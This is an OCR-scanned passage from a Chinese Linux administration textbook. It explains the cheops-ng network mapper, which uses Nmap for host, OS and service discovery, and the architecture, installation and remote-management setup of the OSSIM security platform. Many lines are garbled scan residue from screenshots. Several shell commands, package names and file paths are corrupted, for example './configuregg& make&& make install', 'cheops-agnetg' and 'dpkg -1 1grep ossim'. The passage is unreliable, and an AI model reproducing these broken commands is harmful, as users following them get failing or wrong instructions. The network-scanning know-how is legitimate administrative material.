内 存 和 SWAP 区 平均 使 用 率 越界 告警 、 磁 盘 利 用 率 越界 告警 、 网 卡 平均 流量 的 越界 告警 等 。 
此 外 ,还 可 设计 多 阔 值 告警 模式 ， 允 许 管理 人 员 设 定 多 个 告警 的 阔 值 ， 以 更 方便 地 监控 集群 中 
主机 的 运行 变化 。 


10.6 使 用 cheops-ng 加 强 管理 Linux 网 络 


目前 ,许多 用 户 因 业务 发 展 ,不 断 更 新 或 升级 网 络 ， 从 而 造成 自身 用 户 环 境 差 异 较 大 ， 整 
个 网 络 系统 平台 参差 不 齐 。 在 服务 器 端 大 多 使 用 Linux/Unix 还 有 Windows Server， 客 户 端 计 
算 机 使 用 Windows XP/Windows 7， 所 以 在 企业 应 用 中 ， 往往 是 Linux 和 Windows 操作 系统 共 
存 形成 异 构 网 络 。 本 节 以 Linux 平台 下 一 个 常用 的 管理 软件 cheops-ng 为 例 ， 介 绍 如 何 借助 它 
来 管理 Linux 异 构 网 络 ， 从 而 保障 企业 网 络 高 效 安全 地 运行 。 


10.6.1 cheops-ng 的 工作 原理 


在 日 常 检测 、 管 理 Linux 网 络 故 障 时 ，cheops-ng 对 管理 员 来 说 是 一 种 不 可 或 缺 的 强力 工 
具 。 cheops-ng 是 一 个 软件 嗅 探 器 ， 是 一 个 友好 的 图 形 界面 监视 工具 ， 它 包含 了 常用 网 络 管理 
的 功能 。 由 于 cheops 已 经 停止 开发 ， 所 以 主要 讲解 cheops-ng， 它 可 以 结合 其 他 多 种 工具 〈 如 
NMAP) 对 扫描 结果 进行 分 析 ，, 并 以 图 形 的 方式 向 用 户 提供 从 网 络 资源 分 析 到 故障 诊断 的 各 种 
功能 。 主 要 包括 : 


能 对 节点 机 器 的 各 种 操作 系统 (Unix、Linux、BSD、Windows ) 进行 判断 。 
查找 主机 。 

测绘 网 络 拓扑 。 

建立 主机 服务 列表 。 

查看 /修改 网 络 配置 。 


10.6.2 ”cheops-ng 的 下 载 和 安装 


用 户 可 以 到 cheops-ng 的 主页 : ”http://cheops-ng.sourceforge.net/， 下 载 其 最 新 版 本 0.2.3。 
安装 前 检查 系统 是 否 具备 以 下 环境 ， 而 且 系 统 需 要 GTK+ 的 支持 以 及 NMAP。 


@ gtk >= 1.2.0 
® gnome 
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gnome-xml >= 1.8.0 
glib >= 1.2.0 
glib-devel >= 1.2.0 
imlib >= 1.9.0 
imlib-devel >= 1.9.0 
libpthread 
libgnome-devel 
gnome-libs-devel 
libpng-devel 
esound-devel 
gnomecanvas-devel 
libxml-devel 


#tar zxvf cheops-ng-0.2.3.tgz 
#cd cheops-0.2.3 
#./configuregg& make&& make install 


10.6.3 ”cheops-ng 的 配置 


cheops-ng 采用 客户 机 /服务 器 的 工作 机 制 ， 打 开 cheops-ng 的 目录 ， 将 会 发 现 两 个 可 执行 
文件 : cheops-agent 和 cheops-ng 。cheops-agent 执行 扫描 网 络 的 任务 ，cheops-ng 是 图 形 控制 
前 端 。 首 先 ， 以 超级 用 户 的 身份 打开 X-Window 的 一 个 终端 运行 sheops-agent， 然 后 在 另 一 个 
终端 下 运行 cheops-ng。 
#cheops-agnetg 
#cheops-ng 


其 中 ， 命 令 符号 “& ”表示 把 cheops-agent 进程 放 在 后 台 执 行 。 
首次 运行 cheops-ng 时 要 进行 配置 ， 添 加 主机 网 卡 的 回路 地 址 (127.0.0.1) ， 如 图 10.39 所 示 。 


(eheopeng EE 类 六 
Ele Edt Viewspace 


My Nework Suf | 


图 10.39 添加 主机 的 回路 地 址 
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这 里 ， 封 闭 回 路 的 了 P 地 址 设 定 为 127.0.0.1。 
定位 到 “Edit 一 Settings” 一 栏 ， 弹 出 如 图 10.40 所 示 的 对 话 框 ， 对 其 包含 的 5 个 选项 卡 的 
说 明 如 下 。 


chaope ne 
| 
My Nt 
Agent |Features [Services [Scrpts os Pomaps 上 
Discover Setings 
Discover Retries: 2 ~ 
1 


Nmap setings 
Enable the OS detection option 


Enable UDP port scanning 


Enable RPC scanning 


Enable ldentd scanning 


Select TCP Scan Type: | connect Scan 加 
Select Scan Timing: Normal : S| 
Don't ping the host 


回 Enable Fastscan 


口 speciy the ports to scan 


Ports 


图 10.40 ”cheops-ng 设置 选项 


(1) Agent 是 指 系统 最 多 启动 几 个 监视 窗口 , 根据 机 器 配置 , 一 般 不 超过 5 个 , 如 图 10.40 
所 示 。 

(2) Features 选项 包括 两 大 部 分 : Tool Options 和 Look and Feel， 如 图 10.41 所 示 。 

在 Tool Options 选项 组 中 ，Determine the operating system of new hosts 选项 表示 自动 识别 

新 主机 的 操作 系统 ， 建 议 选中 。Look up hosts Iadd with reverse DNS 选项 表示 搜索 主机 利用 反 
向 查询 DNS， 建 议 选中 。Anutomatically map the network 选项 表示 自动 生成 网 络 拓扑 图 ， 建 议 
选中 .Determine the version of services running on hosts 选项 表示 自动 识别 主机 提供 的 服务 类 型 ， 
建议 选中 。 在 Look and Feel 选项 组 中 ，Confirm Deleting of hosts 选项 表示 可 以 删除 主机 ,建议 
选中 。Use the IP address for the label 选项 表示 使 用 IP 地 址 的 标识 ， 建 议 选中 。Save changes on 
exit 选项 表示 退出 cheops-ng 时 ， 自 动 保存 配置 ， 建 议 选中 。Update the viewspace while moving 
stuff (turn off for slow puters) 选项 表示 更 新 Viewspace 视图 ， 建 议 选 中 。 
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Agert| Features |Sevices [Seripts [oS Pomaps| 
Tool Options 
Determine the operating system of new hosts 


回 Look up hosts | add with reverse DNS 
回 Automatically map the network 
回 Determine the version of services running on hosts 


Re-OS scamPort ScamiCMP Map hosts from map file 


Look and Feel 
回 confim Deleting of hosts 


回 Use the IP address for the label 
Only display hostname, instead of the FODN 
回 Save changes on extt 


回 Update the viewspace while moving stuff (um of for slow puters) 


加 us IP address for merged hosts menues | 


[Cv] [Swe | [Ca | 
图 10.41 配置 Featrues 


(3) Services 主要 包括 主机 中 提供 的 服务 名 称 、 对 应 的 端口 号 、 使 用 的 协议 以 及 命令 格 
式 ， 如 图 10.42 所 示 。 常 用 的 服务 有 Java VNC、VNC、HTTP、Telnet、SSH、FTP， 当 然 也 可 
以 通过 下 面 的 “添加 ”、“ 删 除 ”、“ 编 辑 ” 按 钮 重新 配置 。 


二 | 


[ 


Agort [Features (Seveces [serps OS Pbmaps 
Service [Pon [Protocor [command to execute 
VNCO 5900 UDP serm -e vncviewer %i:%p 
javavNc:0 5800 UDP netscape %t%p 
http 80 UDP netscape %i 
teinet 23 UDP serm -8 telnet 和 | 
ssh 22 UDP wterm -8 ssh %| -| %U 
他 21 UDP ~- xterm-efp%i 
由 添加 多 编辑 | | 由 到 除 | 
Y 呆 ] [98 ] [XX 取 消 | 


图 10.42 配置 Services 
(4) Scripts 自 定义 检测 脚本 ， 如 图 10.43 所 示 。 


Linux ”企业 应 用 案例 精 解 


ry 
Agent Features |Services Scripts | os Poamaps | 
Name [secret Tvewae 
taceroule xterm -hold -e /ust/sbin/raceroute %i yes 
ping aem -hold -e ping %i yes 
电 添 加 你 编辑 电 册 除 
应 用 多 确 定 区 取消 


| 本 | 
图 10.43 配置 Scripts 

我 们 可 以 自己 编写 脚本 来 完善 cheops-ng 的 功能 ， 例 如 “ping xterm -hold -e ping %i”， 
其 作用 是 右键 单 击 图 标 后 能 ping 其 卫 ， 并 把 状态 显示 出 来 。 

(5) OS Pixmaps 是 一 个 设备 管理 窗口 。 在 这 里 可 以 看 到 ，cheops-ng 能 够 管理 几乎 所 有 
的 网 络 设备 和 操作 系统 ， 包 括 普 通 集 线 器 、SUN Solaris 服务 器 、SCO UnixWare 服务 器 、 安 
装 BSD 系统 的 主机 、Linux 服务 器 、Mac、AIX 服务 器 、 打 印 机 、 惠 普 的 Unix 服务 器 、Cisco 
网 络 设备 、 网 络 打印 机 、Windows 主机 等 ， 当 然 也 可 以 通过 下 面 的 “添加 ”、“ 删 除 ”、“ 编 
辑 ” 按 钮 重新 配置 ， 如 图 10.44 所 示 。 


Agent |Features [Services [Seripts | Os Pemaps | 


[File Name [Fammar sing for OS 
ONX 


Hub 


Solaris 


VMS 


-| 次 临 较 慢 愉 蛆 


[|| 多 风 | | 下 册 除 


YI | [全 到 | [XX 取 清 


图 10.44 配置 OS Pixmaps 


Cheops 内 的 图 标 能 基本 满足 日 常 需要 ， 如 果 你 的 设备 在 其 中 没有 相应 图 标 ， 需 要 自己 建 
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立 ， 方 法 是 在 /usr/share/cheops-ng/pixmaps 里 放置 自己 设备 的 图 片 ( 注 意 不 能 直接 放置 JPG 或 
BMP 格式 的 图 片 ， 需 要 进行 转换 ) ， 如 图 10.45 所 示 。 


gun |Fesues |Sevicas | Sarpt | os omaps | 
[Fie Name Fambiar crng or OS 总 pm 
画 F Dower nonps sto 日 攻 可 
思 沪 轴 多 
下 [5 .romen。 ver rn 
WAIX rp 削 | 显 YY = 
~ Mer xpn es moni eon pm 
司 | 本 - 
@ x 多 
后 
| -= < 
加 =m / | 
[TT mon op. vemr 目 
全 确定 次 取消 
| 


图 10.45 放置 自己 设备 的 图 片 


10.6.4 ”cheops-ng 的 运行 


软件 配置 结束 后 ， 就 可 以 通过 选择 “Viewspace 一 Map 一 Map Everything” 选 项 或 使 用 快捷 
键 Ctrl 十 M 查看 初步 的 网 络 拓扑 结构 。 要 想 了 解 这 个 主机 的 详细 情况 , 使 用 鼠标 右键 单 击 计算 
机 图 标 即 可 ， 如 图 10.46 所 示 。 它 可 以 对 这 台 主 机 进行 注释 、 显 示 该 主机 的 详细 情况 、 扫 描 服 
务 和 端口 、 扫 描 操 作 系统 、 反 向 查询 DNS 域名 解析 、 删 除 主机 、 打 印 网 络 拓扑 结构 等 操作 。 


File Page View 
Local NevortcLAN1 |LAN-z Lan-3| 


名 


10.1.1129 101.1.126 


1011125 1011124 101.1.113 101.1.114 1011115 
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5 
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旭 
We 
旭 


2 
日 
a 
Ej 
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EE 
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EE EE EE support®erremenelworks com, 
101133 101131 101128 101129 101130 EL 


101121 101.1.18 10141.20 101117 101119 linux-kcor site 101241 101.11153 


EF ET 列国 国 中 wwnnm 贺 


图 10.46 ”自动 构建 网 络 拓扑 
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10.46 是 系统 自动 描绘 出 的 一 个 比较 复杂 的 网 络 拓扑 ， 可 以 保存 为 *.map 的 格式 文 
件 ， 如 图 10.47 所 示 ， 以 便 日 后 调用 。 


选择 : /rootgnone 
[eneops-na nael ] 


10.47 ”保存 网 络 拓扑 
我 们 还 可 以 对 网 络 进行 进一步 的 配置 : 


(1) 在 cheops-ng 中 添加 主机 : 使 用 鼠标 右键 单 击 屏幕 ， 选 择 Add Hosts 后 ， 在 Hosts 
/Address 中 添加 主机 名 称 或 他 地 址 即 可 。 

(2) 添加 子 网 : 使 用 鼠标 右键 单 击 屏幕 ,选择 Add Network 后 在 Network 中 添加 网 络 号 ， 
在 Netmask 中 加 入 子 网 掩 码 即 可 。 笔 者 在 单位 采用 此 方法 能 监控 所 有 的 VLAN， 约 1000 节点 
的 机 器 设备 ， 这 时 会 对 网 管 工 作 站 机 器 的 性 能 要 求 比较 高 。 

(3) 监控 服务 : 选择 一 台 或 多 台 机 器 对 其 进行 监控 ， 包 括 每 隔 几 分 钟 ping 一 次 检测 可 用 
性 ， 检 测 DNS、WWW、FTP 等 网 络 服务 ， 如 图 10.48 所 示 。 


"3 Ceops hmtwors Uaer eriece 


10.48 ”监控 服务 
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cheops-ng 被 称 作 是 网 管 人 员 的 瑞士 军刀 ， 通 过 它 基 本 上 所 有 的 网 络 设备 都 无 所 通 形 。 不 
管 拿 来 做 例 行 的 监测 工作 , 还 是 对 日 志文 件 进行 分 析 ， 都 是 非常 优秀 的 工具 。 实 际 上 我 们 的 一 
些 网 管 软件 ， 和 一 些 网 络 测试 仪 都 使 用 了 嗅 探 器 技术 。 只 是 许多 计算 机 软件 供应 商 对 其 一 直 读 
莫如 深 。 


10.7 ”打造 开源 安全 信息 管理 平台 


10.7.1 Ossim 背景 介绍 


1. Ossim 产生 背景 


目前 , 网 络 威胁 从 传统 的 病毒 进化 到 像 蠕 虫 、 拒 绝 服务 等 的 恶意 攻击 ， 当 今 的 网 络 威胁 攻 
击 复杂 程度 越 来 越 高 ， 已 不 再 局 限于 传统 病毒 ， 盗 号 木马 、 伪 性 网络、 间谍 软件 、 流 氓 软件 、 
网 络 诈骗 、 垃 圾 邮件 、 蠕 虫 、 网 络 钓鱼 等 严重 威胁 着 网 络 安全 。 网 络 攻 击 经 常 是 融合 了 病毒 、 
蠕虫 、 木 马 、 间 谍 、 扫 描 技 术 于 一 身 的 混合 式 攻击 。 拒 绝 服务 攻击 (DOS) 已 成 为 黑客 及 是 
虫 的 主要 攻击 方式 之 一 。 黑 客 利用 蠕虫 制造 僵尸 网 络 ， 整合 更 多 的 攻击 源 ， 对 目标 集中 展开 狐 
烈 的 拒绝 服务 攻击 。 而 且 攻击 工具 也 越 来 越 先进 , 例如 扫描 工具 不 仅 可 以 快速 扫描 网 络 中 存在 
漏洞 的 目标 系统 ， 还 可 以 快速 植 入 攻击 程序 。 
因此 ， 网 络 安全 管理 的 重要 性 和 管理 困难 的 矛盾 日 益 突出 。 网 络 安全 是 动态 的 系统 工程 ， 
只 有 从 与 网 络 安全 相关 的 海量 数据 中 实时 、 准确 地 获取 有 用 信息 并 加 以 分 析 , 及 时 地 调整 各 安 
全 子 系统 的 相关 策略 ， 才 能 应 对 目前 日 益 严峻 的 网 络 安全 威胁 。 

此 外 ，IDS 安全 工具 存在 的 错 报 、 漏 报 也 是 促成 安全 集成 思想 的 原因 之 一 。 以 IDS 为 例 ， 
总 的 来 说 ， 入 侵 检测 的 方案 有 基于 预定 义 规则 的 检测 和 基于 异常 的 检测 ， 判 断 检测 能 力 的 2 
个 指标 为 灵敏 度 和 可 靠 性 。 不 可 避免 的 ， 不 论 是 基于 预定 义 规则 的 检测 还 是 基于 异常 的 检测 ， 
由 于 防范 总 是 滞后 于 攻击 ， 其 必然 会 遇 到 漏 报 、 错 报 的 问题 。 而 安全 集成 则 由 于 其 集成 联动 分 
析 了 多 个 安全 工具 ,使 得 检测 能 力 即 灵敏 度 和 可 靠 性 都 得 到 大 幅 提升 。 因 此 ， 我 们 需要 将 各 网 
络 安全 子 系统 ,包括 防火 墙 、 防 病毒 系统 、 入 侵 检 测 系统 、 漏 洞 扫描 系统 、 安 全 审计 系统 等 整 
合 起 来 ， 在 信息 共享 的 基础 上 ， 建 立 起 集中 的 监控 、 管 理 平台 ， 使 各 子 系统 既 各 司 其 职 ， 又 密 
切合 作 ， 从 而 形成 统一 的 、 有 机 的 网 络 防御 体系 ， 来 共同 抵御 日 益 增长 的 网 络 安全 威胁 。 

综 上 所 述 ， 就 是 将 前 面 介绍 过 的 Nagios、Ntop、Cheops、Nessus、Snort、Nmap 这 些 
工具 集成 在 一 起 提供 综合 的 安全 保护 功能 ， 而 不 必 在 各 个 系统 中 来 回 切换 ， 且 统一 了 数据 
存储 ， 人 们 能 得 到 一 站 式 的 服务 ， 这 就 是 Ossim 给 我 们 带 来 的 好 处 ， 我 们 这 一 节 的 目标 就 
是 将 它 的 主要 功能 展示 出 来 。 

Ossim 通过 将 开源 产品 进行 集成 ， 从 而 提供 一 种 能 够 实现 安全 监控 功能 的 基础 平台 。 它 的 
目标 是 提供 一 种 集中 式 、 有 组 织 的 ， 能 够 更 好 地 进行 监测 和 显示 的 框架 式 系统 。Ossim 明确 
定位 为 一 个 集成 解决 方案 , 其 目标 并 不 是 要 开发 一 个 新 的 功能 , 而 是 利用 丰富 的 、 强 大 的 各 种 
程序 (包括 Mrtg、Snort、Nmap、Openvas、Nessus 以 及 Ntop 等 开源 系统 安全 软件 ) 。 在 一 个 
保留 它们 原 有 功能 和 作用 的 开放 式 架构 体系 环境 下 ， 将 它们 集成 起 来 。 到 目前 为 止 ，Ossim 支 
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持 多 达 2395 种 插件 (http://www.alienvault.com/community/plugins) 。 而 Ossim 项 目的 核心 工 
作 在 于 负责 集成 和 关联 各 种 产品 提供 的 信息 ， 同 时 进行 相关 功能 的 整合 ， 如 图 10.49 所 示 。 由 
于 开源 项 目的 优点 ， 这 些 工具 已 经 久 经 考验 ， 同 时 也 经 过 全 方位 测试 ， 更 加 可 靠 。 


= 


Consoles Databases 


图 10.49 ”Ossim 提供 功能 的 层次 结构 图 


2. Ossim 流程 分 析 
Ossim 系统 的 工作 流程 为 : 


加 作为 整个 系统 的 安全 插件 的 探测 器 ( Sensor ) 执行 各 自 的 任务 ， 当 发 现 问题 时 给 予 报警 。 

贺 各 探测 器 的 报警 信息 将 被 集中 采集 。 

将 各 个 报警 记录 解析 并 存 入 事件 数据 库 (EDB ) 。 

加 根据 设置 的 策略 (Policy ) 给 每 个 事件 赋予 一 个 优先 级 ( Priority ) 。 

加 对 事件 进行 风险 评估 ， 给 每 个 警报 计算 出 一 个 风险 系数 。 

国 将 设置 了 优先 级 的 各 事件 发 送 至 关联 引擎 ， 关联 引 侈 将 对 事件 进行 关联 。 注意 : 关联 
引擎 就 是 指 在 各 入 侵 检 测 传感器 ( 入 侵 检测 系统 、 防 火 墙 等 ) 上 报 的 告警 事件 基础 上 ， 经 过 关 
联 分 析 形成 入 侵 行为 判定 ， 并 将 关联 分 析 结 果 报 送 控制 台 。 

对 一 个 或 多 个 事件 进行 关联 分 析 后 ,关联 引擎 生成 新 的 报警 记录 , 将 其 也 赋予 优先 级 ， 
并 进行 风险 评估 ， 存 入 数据 库 。 

国 用 户 监控 监视 器 将 根据 每 个 事件 产生 实时 的 风险 图 。 

国 在 控制 面板 中 给 出 最 近 的 关联 报警 记录 ， 在 底层 控制 台中 提供 全 部 的 事件 记录 。 


Ossim 安全 信息 集成 管理 系统 (如 图 10.50 所 示 ) 设计 成 由 安全 插件 (Plug-ins) 、 代 理 进 
程 (Agent)、 传 感 器 (Sensor)、 关 联 引擎 (Server)、 数 据 仓 库 (Database)、Web 框架 (Framework) 
5 个 部 分 构成 。 


Ge 
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图 10.50 ”信息 安全 集成 管理 系统 逻辑 结构 图 


(1) 安全 插件 
安全 插件 即 各 类 安全 产品 和 设施 。 如 防火 墙 、 IDS 等 。 这 里 引入 Linux 下 的 开源 安全 工具 : 
Arpwatch、P0f、Snort、Nessus、Spade、Tcptrack、Ntop、Nagios、Osiris 等 这 些 Plugins 分 别 
针对 网 络 安 全 的 某 一 方面 , 总 的 来 说 , 可 以 将 它们 划分 为 探测 器 (Detector) 和 监视 器 (Monitor) 
两 大 阵营 ， 将 它们 集成 关联 起 来 是 出 于 安全 集成 的 目的 ， 如 图 10.51 所 示 。 


周 192168 15020 [opensoucesm ] tl [Up or ENABLED: 14 / DOWN or DISABLED: 01 Totals: 14 


oem | 
可 


F011-08-12 20:36:52 pam unin: authentication successful 
B01-9913 tplgd arpwatdi Mat address Same 


Hse potteriee comme 
0 5 sshd save erminated 
BIS oO suds emmand omeried | 


和 


B011-0813 06:59.08 ecset Dasec server started, | 


图 10.51 安全 插件 


(2) 代理 进程 
代理 进程 将 运行 在 多 个 或 单个 主机 上 ,负责 从 各 安全 设备 、 安 全 工具 采集 相关 信息 (如 报 
警 日 志 等 ) ， 并 将 采集 到 的 各 类 信息 统一 格式 ， 再 将 这 些 数据 传 至 Server。 
Agent 的 主要 功能 是 接收 或 主动 抓 取 Plugin 发 送 过 来 或 者 生成 的 文件 型 日 志 , 经 过 预 处 理 
后 有 序 地 传送 到 Ossim 的 Server。 它 的 功能 很 复杂 , 因为 它 的 设计 要 考虑 到 如 果 Agent 和 Server 
之 间 的 网 络 中 断 、 拥 堵 、 丢 包 以 及 Server 端 可 能 接收 不 过 来 甚至 死机 等 情况 ， 确 保 日 志 不 丢 
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失 也 不 漏 发 。 基 于 这 个 考虑 , Ossim 的 日 志 处 理 在 大 部 分 情况 下 不 能 做 到 实时 , 通常 会 在 Agent 
端 缓存 一 段 时 间 才 会 发 送 到 Server 端 。Agent 会 主动 连接 两 个 端口 与 外 界 通 信 或 传输 数据 ,一 
个 是 连接 Server 的 40001 端口 ， 另 一 个 是 连接 数据 库 的 3306 端口 。 


(3) 传感器 

传感器 通常 会 被 我 们 理解 为 一 段 程序 , 但 它 不 是 一 个 确定 的 程序 , 而 是 一 个 逻辑 单元 的 概 
念 。 在 Ossim 中 ， 把 Agent 和 插件 构成 的 一 个 具有 网 络 行为 监控 功能 的 组 合 称 为 一 个 传感器 
(Sensor) ，Sensor 的 功能 范围 主要 有 : 


入 侵 检测 (Snort ) 

漏洞 扫描 (Nessus ) 

异常 检测 (Spade，POf、Pads、Arpwatch、RRD ab behaviour ) 
网 络 流 量 监控 与 剖析 (Ntop ) 


采集 本 地 路 由 器 、 防 火 墙 、IDS 等 硬件 设备 ， 作 为 防火 墙 使 用 。 在 具体 的 部 署 中 ， 以 上 功 
能 通常 可 以 部 署 在 一 台 服 务 器 上 ， 也 可 以 分 多 台 服 务 器 部 署 。 


(4) 关联 引擎 
关联 引擎 是 Ossim 安全 集成 管理 系统 的 核心 部 分 , 支持 分 布 式 运行 , 负责 将 Agent 传送 来 
的 事件 进行 关联 ， 并 对 网 络 资产 进行 风险 评估 。 


(5) 数据 仓库 

数据 仓库 由 Server 将 关联 结果 写 入 Database， 此 外 ， 系 统 用 户 〈 如 安全 管理 员 ) 也 可 通 
过 Framework (Web 控制 台 ) 对 Database 进行 读 写 。 数 据 仓库 是 整个 系统 事件 分 析 和 策略 调 
整 的 信息 来 源 ， 从 总 体 上 将 其 划分 为 事件 数据 库 (EDB) 、 知 识 数据 库 (KDB， 它 如 同一 个 
知识 管理 中 心 ， 记 录 着 各 种 问题 的 资料 档案 ) 、 用 户 数据 库 (UDB) 、Ossim 系统 默认 使 用 的 
MySQL 监听 端口 是 3306， 在 系统 中 数据 库 的 负担 最 重 ， 因 为 它 除 了 存储 数据 外 ， 还 要 对 其 进 
行 分 析 整 理 ， 所 以 实时 性 不 强 ， 这 也 是 Ossim 架构 最 大 的 缺陷 。 


(6) Web 框架 
Web 框架 控制 台 ， 提 供用 户 ( 安 全 管理 员 ) 的 Web 页 面 ， 从 而 控制 系统 的 运行 (例如 设 
置 策略 ) ， 是 整个 系统 的 前 端 ， 用 来 实现 用 户 和 系统 的 B/S 模式 交互 。Framework 可 以 分 为 2 
个 部 分 : Frontend 是 系统 的 一 个 Web 页 面 ， 提 供 系统 的 用 户 终 端 ， Frameworkd 是 一 个 守护 进 
程 ， 它 绑 定 Ossim 的 知识 库 和 事件 库 ， 侦 听 端 口 是 40003， 负 责 将 Frontend 收 到 的 用 户 指令 和 
系统 的 其 他 组 件 相 关联 ， 并 绘制 Web 图 表 供 前 端 显示 。 


10.7.2 安装 Ossim 


安装 Ossim 和 普通 Linux 发 行 版 没有 什么 区 别 , 在 企业 环境 部 署 的 时 候 可 参照 前 面 一 节 讲 
解 的 Ntop 原则 ,硬件 选择 方面 我 们 部 署 Ossim 需要 一 台独 立 的 高 性 能 服务 器 (内 存 至 少 为 8GB 
且 配 备 了 多 处 理 器 ,硬盘 空间 不 低 于 ITB) ， 选 择 自 定义 安装 ， 到 分 区 选项 中 选择 Guided-use 
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entire disk and set up LVM; 在 分 区 定义 时 不 要 选择 All files in one partition, 而 需要 选择 第 三 项 ， 


将 /home、/sr/、/var、/tmp 分 开 ， 如 图 10.52 所 示 。 


partition disks 


This is an oerview of your currently corfigured partitons and mount points, Select a partition to modiy its settings (fle 


system, mount point, etcJ, a fiee pace to create partitions, or a device to initialize its partition ab 


¥ MVG localhost, IV home -18.3 GB Linunx device-mapper (linear) 


> 机 18.3 GB f ext3 /home 
一 MMVvG localhost, LV root - 348.1 MB Linux device-mapper (linear) 
> a 348.1 MB f en3 / 


IMMVG localhost, LV swap_1 - 2,7 6B Linux device-mapper (linear) 


> 让 27GB f swap swap 
© IMMVG localhost, IV tmp - 398.5 MB Linux device-mapper (linear) 
> al 398.5 MB f ex3 -Amp 


¥ VMVG pcalhost, IV usr - 5.0 GB Lintx device-mapper (Inear) 
> 机 5.0 GB f ext3 /usr 


Sreenshot oack | 


图 10.52 分 区 选项 


由 于 篇 幅 所 限 ,安装 的 其 他 过 程 就 不 再 讲解 ,安装 时 间 一 般 为 半 小 时 左右 (根据 硬件 配置 


来 定 ) 。 


安装 完毕 后 重启 机 器 , 然后 在 客户 机 中 输入 机 器 的 瑟 地 址 , 这 里 是 


http://192.168.150.20/, 


首次 登录 系统 时 输入 用 户 名 (admin) 及 密码 (admin) ， 这 时 系统 会 提示 修改 密码 。 
由 于 Ossim 是 用 精简 的 Debian Linux 裁剪 而 成 ， 所 以 没有 图 形 界面 。 在 配置 好 网 络 之 后 
首次 登录 时 建议 进行 系统 升级 (同时 也 升级 漏洞 库 )， 升级 方法 非常 简单 , 只 须 输 入 如 下 命令 : 


alienvault-update 


首次 升级 时 数据 量 比较 大 ,通常 在 500MB 左右 ， 这 时 需要 你 的 网 络 环境 比较 好 。 这 里 需 
要 注意 的 是 整个 系统 的 配置 文件 在 /etc/ossinmyossim_setup.conf 里 配置 ， 包 含 了 登录 的 卫 信息 、 


主机 名 、 监 听 网 卡 名 称 、MySQL 名 、SNMP、 启 动 的 Sensors 类 别 、 


注意 : Ossim3 和 Ossim4 的 版 本 路 径 稍 有 不 同 。 


监听 的 网 段 等 重要 信息 。 


Ossim3 主要 更 新 包 地 址 为 http://data.alienvault.com/alienvault3/binary/Packages。 
Ossim4 主要 更 新 包 地 址 为 http://data.alienvault.com/alienvault4/binary/Packages。 
系统 更 新 脚本 会 保存 在 /usr/share/ossim-install/temp/alienvault4_update_script 文件 中 。 


Web 方式 则 会 在 GUI 界面 自动 提示 待 单 击 确定 按钮 后 会 自动 进行 。 


更 新 完毕 后 ， 你 可 以 通过 命令 行 查看 一 下 到 底 有 哪些 Ossim 数据 包 ， 使 用 以 下 命令 : 


#dpkg -1 1grep ossim 
#dpkg -1 1grep alienvault 


注意 : 关于 汉化 的 问题 ，Ossim 的 中 文 语言 包 是 “/usr/share/local/zh_CN/LC_MESSAGES/ 


ossim.po”， 输 入 以 下 命令 即 可 : 


#msgfmt ossim.po -o ossim.mo 
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因为 Apache 默认 页 面 的 字符 编码 为 UTF-8， 为 防止 每 次 刷新 后 显示 乱码 ， 需 要 修改 
“/etc/apache2/conf.d/charset”, 注销 AdddefaultCharset UTF-8 一 行 , 然后 启用 AddDefaultcharset 
gb2312， 最 后 重启 Apache， 命令 如 下 : 


#/etc/init.d/apache2 restart 
10.7.3 ”安装 远程 管理 工具 


默认 情况 下 Ossim 系统 能 够 通过 ssh 方式 远程 管理 ， 下 面 介 绍 两 款 更 直观 更 便捷 的 、 基 于 
Web 的 管理 工具 : Webmin 和 PhpmyAdmin。 


1. 安装 Webmin 管理 工具 


Ossim 支持 Webmin， 系 统 安装 此 管理 工具 的 目的 是 方便 使 用 者 管理 系统 。 有 具体 安装 步骤 
如 下 : 


加 从 Webmin 的 官网 (www.webmin.com ) 下 载 webmin 安装 包 (目前 最 新 1.6) ， 解 压 
并 安装 ( ./setup.sh ) ， 过 程 略 。 

园 当 Webmin 安装 好 后 ,系统 将 10000 端口 监听 请 求 ,登录 系统 ,在 浏览 器 地 址 栏 输 入 

http:/ 主 机 名 (或 卫 ) :10000， 例 如 http://alienvault:10000/。 


#netstat -nalgrep 10000 \\ 测 试 服务 是 否 启动 


由 于 Ossim 默认 没有 图 形 界面 ， 这 时 你 会 发 现在 本 机 无 法 登录 ， 利 用 基于 文本 的 浏览 
(lynx) 可 以 测试 是 否 连 上 系统 ， 在 Ossim 里 安装 X-Window 可 以 连接 。 建 议 大 家 修改 
/etc/webmin/miniserv.conf 配置 文件 在 这 个 配置 文件 的 最 后 一 行 加 入 allow=192.168.150.0 (一 个 
网 络 号 ，IP 地 址 也 可 以 ) ， 即 可 实现 远程 访问 。 


2. 安装 phpyAdmin 


自从 1998 年 9 月， 由 Tobias Ratschiller 发 布 第 一 个 phpMyAdmin 工具 以 来 ， 这 一 项 目 诞 
生 15 周年 ， 它 已 成 为 类 Mysql 数据 库 维护 的 主要 工具 之 一 ， 它 的 最 大 特点 就 是 直观 ， 几 乎 所 
有 的 内 容 都 是 通过 图 形 化 方式 展现 ， 特 别 是 其 中 分 析 数 据 表 功 能 能 帮助 我 们 分 析 Ossim 数据 
库 ， 由 于 Ossim 系统 主要 是 采用 mysql 数据 库 ， 所 以 使 用 phpAdmin 来 远程 监控 和 管理 数据 库 
比较 方便 。 例 如 当 Ossim 系统 “吃紧 ”时 它 可 以 帮助 我 们 快速 查看 服务 器 的 运行 状况 ， 这 样 
可 以 迅速 的 排除 故障 原因 。 而且 只 需 点 击 下 鼠标 就 能 方便 的 备份 和 回复 数据 库 , 但 不 足 的 是 无 
法 备份 数据 库 中 的 某 几 个 表 ， 这 里 告诉 大 家 这 一 解决 办 法 ， 我 们 知道 备份 出 来 的 都 是 SQL 脚 
本 , 我 们 获得 备份 的 文件 后 打开 脚本 ， 找 到 你 要 的 表 生 成 的 比分 ， 复 制 到 另 一 个 文本 文件 并 保 
存 为 sql 扩展 名 ， 然 后 用 查询 分 析 器 执行 即 可 。 

安装 前 首先 在 Ossim 控制 台 停止 MySQL， 输 入 以 下 命令 : 


#/etc/init.d/mysql stop 
#/etc/init.d/mysql start 
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然后 执行 下 面 两 个 步骤: 


下 载 phppMyAdmin-3.5.3-english targz， 目 前 最 新 版 本 为 4.0.7， 将 它 下 载 到 /root 目录 ， 然 
后 解压 后 进入 目录 phpMyAdmin-3.5.3, 将 config sample inc.php 修改 成 config incphp 其 他 内 容 不 动 。 

贺 将 phpMyAdmin-3.5.3 目录 移动 到 Ossim 网 站 根 目 录 即 ，/usr/share/ossim/www， 还 记 
得 前 面 一 节 讲 过 Ossim 架构 吗 ， 因 为 他 访问 的 是 Ossim Framwork 框架 ， 所 以 要 到 
/etc/ossim/framwork 目录 下 查看 ossim.conf 配置 文件 。 


